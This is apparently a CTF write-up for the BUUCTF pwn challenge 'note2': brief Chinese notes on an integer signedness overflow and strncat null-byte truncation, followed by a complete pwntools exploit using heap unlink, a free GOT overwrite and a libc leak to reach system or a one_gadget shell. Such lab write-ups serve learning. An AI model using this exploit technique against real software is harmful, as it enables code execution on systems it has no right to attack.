note2

没开偏移的保护

size是无符号数

进函数后变有符号数，会有溢出

这里只能用字节来填充，b’\x00’都不行

改了free_got才free的，会执行one_gadget

用system打会报错，不行

因为这里有个strncat(dest, (const char *)v7 + 15, 0xFFFFFFFFFFFFFFFFLL);函数，遇到‘\0’或空字符截停

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",27431)
p=process("./note2")
context.log_level="debug"
libc=ELF('./libc-2.23.so')
elf=ELF('./note2')
p.sendlineafter(' name:','sdf')
p.sendlineafter('address:','asdf')

def add(size,content):
    p.sendlineafter('option--->>','1')
    p.sendlineafter('(less than 128)',str(size))
    p.sendlineafter(' content:',content)

def show(index):
    p.recvuntil(">>")
    p.sendline("2")
    p.recvuntil(":")
    p.sendline(str(index))

def edit(index, choice, content):
    p.recvuntil(">>")
    p.sendline("3")
    p.recvuntil(":")
    p.sendline(str(index))
    p.recvuntil("]")
    p.sendline(str(choice))
    p.recvuntil(":")
    p.sendline(content)

def free(index):
    p.recvuntil(">>")
    p.sendline("4")
    p.recvuntil(":")
    p.sendline(str(index))
'''
io.recvuntil(":")
io.sendline("/bin/sh") #name
io.recvuntil(":")
io.sendline("ddd")
'''
ptr=0x602120
fd=ptr-0x18
bk=ptr-0x10

payload=b'\x00'*8+p64(0xa1)+p64(fd)+p64(bk)
add(0x80,payload) 	#0
add(0,'sadf')     	#1
add(0x80,'bin/sh')	#2
free(1)

payload=p64(0)*2+p64(0xa0)+p64(0x90)
add(0,payload)

free(2)
#b'a'*0x18
free_got=elf.got['free']
payload=b'a'*0x18+p64(free_got)
edit(0,1,payload)
gdb.attach(p)
sleep(1)
show(0)
p.recvuntil('is ')
addr=u64(p.recv(6).ljust(8,b'\x00'))
base=addr-libc.sym['free']
system=base+libc.sym['system']
one=base+0xf02a4
edit(0,1,p64(system))
print(hex(addr))

#p.sendline(payload)

p.interactive()